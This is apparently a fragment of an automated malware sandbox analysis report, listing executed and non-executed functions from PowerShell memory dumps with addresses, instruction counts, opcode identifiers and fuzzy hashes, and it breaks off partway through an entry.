                                              • Instruction Fuzzy Hash: 85F1A430A08A8D8FEBA8DF2CD8557E93BD1FF55310F04426EE84DC7691DB38A9458B81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD3489BF52 Relevance: .5, Instructions: 458COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2664640595.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 81dc654570a6bc1a1b36780a5363237bc36b59d65d46956ace83e1fe88dd7f8c
                                              • Instruction ID: 06e33d28a728a5bb8e75dfcd34cb9f31f00a2d2fe2dfa6d1b7655e086bd4e783
                                              • Opcode Fuzzy Hash: 81dc654570a6bc1a1b36780a5363237bc36b59d65d46956ace83e1fe88dd7f8c
                                              • Instruction Fuzzy Hash: 6DE1B430A08E8D8FEBA8DF28C8557E97BD1FF55310F04426EE84DC7291DB79A9408B81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD3489C6B0 Relevance: .3, Instructions: 275COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2664640595.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ddf48c028d6ca1e21b9461dfa69392e3660c2d882ea2c9919510a155ac81fa9
                                              • Instruction ID: 90ab7692a57589066e1c489f2bf149bc4884b807710b4c2e1ddba4c7d716566f
                                              • Opcode Fuzzy Hash: 4ddf48c028d6ca1e21b9461dfa69392e3660c2d882ea2c9919510a155ac81fa9
                                              • Instruction Fuzzy Hash: 7B81287071CA494FE799EB1CC4E5AB5BBE1EF9A350B10057DD08AC32A2DA36F842C741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34964323 Relevance: .1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2665416239.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a90bf195f33d516c1bb234de15521fbb8b42f41c1044b19880ba930024726ad9
                                              • Instruction ID: f68b616151d03e395560d0a7432b5c6cf0d501c9eef1177e8322ea9d00301b59
                                              • Opcode Fuzzy Hash: a90bf195f33d516c1bb234de15521fbb8b42f41c1044b19880ba930024726ad9
                                              • Instruction Fuzzy Hash: F621F632B0DA898FD795DB9C94A49A477E2FF95224B5800B9D51CC7297DD3DEC409700
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34965437 Relevance: .1, Instructions: 64COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2665416239.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 868d59bb6b7c9e377a35f37fb9422283949d79aafea43b52acc8b1e49c66acaf
                                              • Instruction ID: 9f741debe04a1672723577dac105561664c4464a3fbab0fe41907b3fee88e713
                                              • Opcode Fuzzy Hash: 868d59bb6b7c9e377a35f37fb9422283949d79aafea43b52acc8b1e49c66acaf
                                              • Instruction Fuzzy Hash: 75115922F1EAA90FE3F1A29838B50B462C0EF5567174801FBDD0CD328BDC1C6C004391
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34893945 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2664640595.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                              • Instruction ID: 241876a0f25de1cf04efdc636e1e615018bbc16f719980464517d69e48099cc2
                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                              • Instruction Fuzzy Hash: 8A01677121CB0D4FD744EF4CE451AA5B7E0FB99364F10056DE58AC3651D636E881CB45
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 00007FFD34893BFB Relevance: .7, Instructions: 682COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2664640595.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b220486cbd4780a404a7730fc3ae06f496fb9965d6f65f9893c68b57e6f2a107
                                              • Instruction ID: 5aa2347643375323bd131b49711efec2b876c4f034d72227262f63a280546d6a
                                              • Opcode Fuzzy Hash: b220486cbd4780a404a7730fc3ae06f496fb9965d6f65f9893c68b57e6f2a107
                                              • Instruction Fuzzy Hash: 19220736B0CA5A5FDB51EBACD4B15E97BF0EF96324B0801B7C148C7193DE38A8468790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD348964FB Relevance: .4, Instructions: 377COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2664640595.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0f252b53791e8f2bff56f92647e1875f2931f358b68d7782f5c98285d9bef88
                                              • Instruction ID: 928be0ef906c7bdf49f748f979c2d635ad35e67f825b80eecdd78870daba4ae4
                                              • Opcode Fuzzy Hash: c0f252b53791e8f2bff56f92647e1875f2931f358b68d7782f5c98285d9bef88
                                              • Instruction Fuzzy Hash: 5FB17687B0DBD25BF252576C68FA0DA7FE4DF5326471900B7C6C4DA4A3ED1C280BA251
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34895CD8 Relevance: .3, Instructions: 314COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2664640595.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 02d5355f2e8530c9a666059b35a68f2d7a361c8f0be64df14dc1cf9019b547e4
                                              • Instruction ID: a20ce0170393c95c142681c19e2da112a7d0cc474b858d777a565d05f40fe58a
                                              • Opcode Fuzzy Hash: 02d5355f2e8530c9a666059b35a68f2d7a361c8f0be64df14dc1cf9019b547e4
                                              • Instruction Fuzzy Hash: 9B916157B0EBD21BE762577C58FA0DA3FA0DE5326470D11F7C6D4CA093AD0D280BA692
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              Function 046BF250 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V_k
                                              • API String ID: 0-804111439
                                              • Opcode ID: c7a098f29d7919fa3bde28a0cf1858631d6e0f01dbf5b6622336e2b111c1e125
                                              • Instruction ID: 14547d99b577b3597cf0d6722afd4e859e14373948b28dbb6a6610dfa3aeb5f9
                                              • Opcode Fuzzy Hash: c7a098f29d7919fa3bde28a0cf1858631d6e0f01dbf5b6622336e2b111c1e125
                                              • Instruction Fuzzy Hash: 0EB15C71E002099FDB18CFA9CC857DEBBF2AF98704F148129D855E7364EB74A881CB85
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046BFB20 Relevance: .3, Instructions: 266COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 267d07f8d14adedded17958cc2027e81b4e9bd37bdd2bf01d653ab85c67191d9
                                              • Instruction ID: 28aba65caa350ca4048051c43a9bf32f2eba05aba05fa1c015fc3dde3f79e7af
                                              • Opcode Fuzzy Hash: 267d07f8d14adedded17958cc2027e81b4e9bd37bdd2bf01d653ab85c67191d9
                                              • Instruction Fuzzy Hash: 72B14F70E002099FDB14CFA9DC957EEBBF2AF48714F148529D855E7364EB74A882CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046BC2EC Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: h]_k$I_k
                                              • API String ID: 0-3564571517
                                              • Opcode ID: 6d1949c5ddfe07f255940180644c5b09bb9f9dfed44b2375e658f1fe99d18e5f
                                              • Instruction ID: 7124cceb26bff17c7620059df9ee566ceeda23ea360164b312a372ce1950bd38
                                              • Opcode Fuzzy Hash: 6d1949c5ddfe07f255940180644c5b09bb9f9dfed44b2375e658f1fe99d18e5f
                                              • Instruction Fuzzy Hash: 5C315E30B042288FCB269B34C8506EEB7B6AF89308F0004EDD509AB351DF359E86CF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046BF244 Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V_k
                                              • API String ID: 0-804111439
                                              • Opcode ID: 43539c090b14d4ad8c7a94a4777367e952f78131dc0cc5fd525bc0350c90f3ab
                                              • Instruction ID: ae5db70eb45c227f74efc00028ba2cde70924b5b87df3e80c8932bb2d942812b
                                              • Opcode Fuzzy Hash: 43539c090b14d4ad8c7a94a4777367e952f78131dc0cc5fd525bc0350c90f3ab
                                              • Instruction Fuzzy Hash: D6B16B71E00209DFDB14CFA9C8857DDBBF1AF58714F148129E895E7364EB74A881CB85
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04905C30 Relevance: .8, Instructions: 769COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de0749473d8c9ad727fbd47cb7fc517cf6023c6bd157c442de3a7068f661c9e3
                                              • Instruction ID: 0ac169a681a16a9d596629ec8865fcefb5a7139d8b3829a89360c887c57b65a5
                                              • Opcode Fuzzy Hash: de0749473d8c9ad727fbd47cb7fc517cf6023c6bd157c442de3a7068f661c9e3
                                              • Instruction Fuzzy Hash: 71628174A00215DFDB24DF58C854BAABBB6AF84710F14C469D509AF785CB71EC82CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04904D70 Relevance: .7, Instructions: 741COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ab81fa2930aa0820715194b7a365a1ae89c42f48672162bb23ca54b24c7cad9e
                                              • Instruction ID: f45d981eedc7beb172a6af8200150197e6cbf32c9c2c136b0077b638cca6300e
                                              • Opcode Fuzzy Hash: ab81fa2930aa0820715194b7a365a1ae89c42f48672162bb23ca54b24c7cad9e
                                              • Instruction Fuzzy Hash: 98624A74B00208DFDB14CB98C544AAEBBB6AF84714F25C069E909AF795CB72EC46CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0490B1DD Relevance: .7, Instructions: 704COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 56a919a09b29ca714a40198944a1c3ab98d5091f26049f2f4b39b169d2988445
                                              • Instruction ID: 896c61e2a246daeadf115ec81c88a0ed5bcaba8855d9b66b607fe228931d544f
                                              • Opcode Fuzzy Hash: 56a919a09b29ca714a40198944a1c3ab98d5091f26049f2f4b39b169d2988445
                                              • Instruction Fuzzy Hash: 1B625E74A00219DFDB24DB64C854BEEBBB2AF85740F1081E9D509AB791CB71EE81CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04904D53 Relevance: .6, Instructions: 555COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 181f90a1c98a0ccdde7eedb20f03470b0c3afad69d998fe17cdf53183c6bbb97
                                              • Instruction ID: 9e790fee7b9f0ba3f5c5a2aad2ef27ab607184908970c9149fa8f1e497025a15
                                              • Opcode Fuzzy Hash: 181f90a1c98a0ccdde7eedb20f03470b0c3afad69d998fe17cdf53183c6bbb97
                                              • Instruction Fuzzy Hash: 55322B78B00204DFDB14CB98C544EA9BBB6AF84724F15C069E909AF395CB72EC86CF55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 049054E5 Relevance: .5, Instructions: 483COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9f7e799d1f4914f71477ba5479c5cab57273061bc682c580be0d9040b8c1cdc4
                                              • Instruction ID: 7ddda8ed0f90945d6363d6a1943a9b8db1ae9f2522b126071aed43cf52bec640
                                              • Opcode Fuzzy Hash: 9f7e799d1f4914f71477ba5479c5cab57273061bc682c580be0d9040b8c1cdc4
                                              • Instruction Fuzzy Hash: F8122C78B00204EFDB14CB98C544EA9B7B6AF84724F15C069E909AF395DB72EC46CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04904728 Relevance: .5, Instructions: 467COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0c4e75294c9341275d6ad651e43f751a1947b1a94ce4f1d4af2046c2a496bac
                                              • Instruction ID: 6e7828a6cad77256950fe103e73f76a41378d0cfefaf0b70f180601289833fef
                                              • Opcode Fuzzy Hash: c0c4e75294c9341275d6ad651e43f751a1947b1a94ce4f1d4af2046c2a496bac
                                              • Instruction Fuzzy Hash: F402AD74B00214DFDB14DBA8C854BAEBBE6AFC4714F14C469EA05AB795CB32EC41CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04902818 Relevance: .5, Instructions: 454COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a6ccd93538e005b6348ee7a9e81eea63890608ee4b7edf5627a335b46f448aaa
                                              • Instruction ID: e4e31481293e6a0a06f738252fbaa6f0318a89e9aa281b1641fc96503630a61a
                                              • Opcode Fuzzy Hash: a6ccd93538e005b6348ee7a9e81eea63890608ee4b7edf5627a335b46f448aaa
                                              • Instruction Fuzzy Hash: 18E1E435B04255DFDB258B74C4186AABBAAAF86310F14C4FBD545CB2D2EB31EC41C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0490C611 Relevance: .4, Instructions: 397COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bc5759c16afe9760a8a966ea533e3319c96c4ce240c051de15b8d31935a3bd83
                                              • Instruction ID: 18a8a01f8d7bb4898ec1a0f288d22dd262019caacb7ae14ff7245af65523b638
                                              • Opcode Fuzzy Hash: bc5759c16afe9760a8a966ea533e3319c96c4ce240c051de15b8d31935a3bd83
                                              • Instruction Fuzzy Hash: 4D024C74A00265DFDB24DB64C954BAEBBB2AF85340F10C1E5DA09AB791CB71AEC1CF41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 049062AB Relevance: .4, Instructions: 387COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 56cfd97f9a92967a6741157d4a496da134ab16d3bd798131e2c1b3d270fd22ad
                                              • Instruction ID: ac5a4c3603b5605a8da44858189f266caff934a001eae5cebfcb1f56cc227958
                                              • Opcode Fuzzy Hash: 56cfd97f9a92967a6741157d4a496da134ab16d3bd798131e2c1b3d270fd22ad
                                              • Instruction Fuzzy Hash: DAF15F74A00215DFEB24DB58C850FAABAB7AFC4740F10C0A9D509AB796CB71ED818F55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0490E2E8 Relevance: .4, Instructions: 379COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 011a8c44f232b2d7ce5e8de3348c890b11e33709c2c3900c0875856556d7759e
                                              • Instruction ID: 1aa31fb94e4a703b3410a4ec2f6b815096c5cf8a54c452f574ffc1b22213ff51
                                              • Opcode Fuzzy Hash: 011a8c44f232b2d7ce5e8de3348c890b11e33709c2c3900c0875856556d7759e
                                              • Instruction Fuzzy Hash: 29E16075B00204DFDF14CBA8C454AAABBF6AFC8314F14C86AE905AB795DB71EC41CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0490B900 Relevance: .4, Instructions: 363COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a78ff54057113aa443ea7b4f4f60bde8d8bedcfdbb2f552d0b2a7263cf5c5ebe
                                              • Instruction ID: 505a733497fb40000e933335e0300c4848940946f89d35ebe4e43adae512fb8f
                                              • Opcode Fuzzy Hash: a78ff54057113aa443ea7b4f4f60bde8d8bedcfdbb2f552d0b2a7263cf5c5ebe
                                              • Instruction Fuzzy Hash: D4E15F74A00255DFDB14DB68CC54BAEBBA3AFC5740F1084A9D609AF391CB71EE818F91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04907048 Relevance: .3, Instructions: 339COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cdd1dbbed553d524806fda088b7a69c718d2fb35a8c7a7554e623adecd58c8fe
                                              • Instruction ID: e3d6e3ca5df7304332e2ce998a06135668bebeeee76d0e7af13b4bd9c9234435
                                              • Opcode Fuzzy Hash: cdd1dbbed553d524806fda088b7a69c718d2fb35a8c7a7554e623adecd58c8fe
                                              • Instruction Fuzzy Hash: 66D16C74A00205DFDB18DBA8C454BAEBBB2AFC4710F20C469E5056F395CF75E841CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04900638 Relevance: .3, Instructions: 328COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df783f0b77d3d6167cd973fe18264e35e8224cfde0a88e02e2a3aeb3b8f1b80a
                                              • Instruction ID: 671ce72451fcc8516abfda86ff408512bb38bb3235aaab669e4d6bd8ef633959
                                              • Opcode Fuzzy Hash: df783f0b77d3d6167cd973fe18264e35e8224cfde0a88e02e2a3aeb3b8f1b80a
                                              • Instruction Fuzzy Hash: 06B12C35B04255CFEB248B68E8447BABBAAAFC1310F14C17BD5059B6D1DB32E841C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046B3670 Relevance: .3, Instructions: 309COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 90d60de54865dee1bbf332cf1e5bcc5ece6f21925a4014dd77572a4c9da9bc29
                                              • Instruction ID: 176d4c1b878ed5344a8e02321bc9db3bfd7c414654fc0c5ae5a2c2ef53aa9c73
                                              • Opcode Fuzzy Hash: 90d60de54865dee1bbf332cf1e5bcc5ece6f21925a4014dd77572a4c9da9bc29
                                              • Instruction Fuzzy Hash: 86D1F674A01249EFDB05CFA8D484A9DFBB2EF48310F258559E854AB351E731ED82CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04907028 Relevance: .3, Instructions: 268COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f2a88afe0ca033e60560a41c0a233abb3476b4939cdbf4e87bdea06bab7e6b3
                                              • Instruction ID: 634499ef2a5d39f07a66a01360f14ed91d94d6f455233d9795966660df8514a9
                                              • Opcode Fuzzy Hash: 6f2a88afe0ca033e60560a41c0a233abb3476b4939cdbf4e87bdea06bab7e6b3
                                              • Instruction Fuzzy Hash: 68B16C74A00204DFDB14DF98C454BAEBBB2AF88710F25C4A9E9056F396CB75F846CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046BFB15 Relevance: .3, Instructions: 268COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9c57d7f3fd905b3b13c62d627fd65614e651503318b614bfa2ac25ccea18eff7
                                              • Instruction ID: d2e7ab4c6bb38b8f471224e85cbd44dec923caeb212d792624cf32c7f8b64c00
                                              • Opcode Fuzzy Hash: 9c57d7f3fd905b3b13c62d627fd65614e651503318b614bfa2ac25ccea18eff7
                                              • Instruction Fuzzy Hash: A8B15A70E002099FDB14CFA9DC957EEBBF1AF48714F148529E854E7364EB74A886CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046B8D38 Relevance: .3, Instructions: 266COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f687767782c7eee6efd259a36fa14e395274af81b78c681ead077807126e3877
                                              • Instruction ID: 412e01b4475cffd8861a8003906c9d0cfb2469d08d25b607202ff1860fe0b3ed
                                              • Opcode Fuzzy Hash: f687767782c7eee6efd259a36fa14e395274af81b78c681ead077807126e3877
                                              • Instruction Fuzzy Hash: 96A18E71A00248DFDB14EFA4D944AEDBBB6FF84304F118559E946AB354EB34AD89CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046B8528 Relevance: .2, Instructions: 232COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba824cd38c28e9839c56a978e5af6492a14b39b3484ad7e67a62aecd2fdeae6a
                                              • Instruction ID: 7a3647a23061fc0acb93865a29cd09581968ccae4c84135071cfe2ce90263131
                                              • Opcode Fuzzy Hash: ba824cd38c28e9839c56a978e5af6492a14b39b3484ad7e67a62aecd2fdeae6a
                                              • Instruction Fuzzy Hash: FC91BE30A002449FC725EF68D8449EDBBF6BF89314F1485A9D4859B762DB35EC86CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04902F05 Relevance: .2, Instructions: 215COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a4ce56ce6ac54496f3ca3ff9369294123aeb641376a8baf19eb703f7af81fc44
                                              • Instruction ID: 2d938b836bbf5a714840739f2d8224a1360a52ffd4db3ea016b3503ef856aeed
